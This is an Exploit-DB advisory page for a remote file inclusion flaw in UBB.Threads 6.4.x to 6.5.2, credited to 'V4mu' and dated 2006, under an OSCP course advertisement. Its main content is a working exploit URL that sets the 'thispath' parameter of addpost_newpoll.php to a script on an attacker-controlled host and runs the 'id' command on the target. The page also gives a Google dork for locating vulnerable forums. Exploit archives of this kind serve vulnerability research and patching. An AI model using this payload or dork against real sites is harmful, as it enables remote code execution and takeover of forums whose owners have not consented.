UBBCentral UBB.Threads 6.4.x < 6.5.2 - 'thispath' Remote File Inclusion

EDB-ID:

1814


Author:

V4mu

Type:

webapps


Platform:

PHP

Date:

2006-05-22


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

Anomaly 1n The System presents
UBB.threads >= 6.4.x Remote File Inclusion
 
founded by V4mu in 04/20/2006

URL: http://www.ubbcentral.com
Google dork: allinurl:"/ubbthreads/"

exploit:
/addpost_newpoll.php?addpoll=preview&thispath=http://[attacker]/cmd.gif?&cmd=id
 
contact: irc.gigachat.net #A1TS

# milw0rm.com [2006-05-22]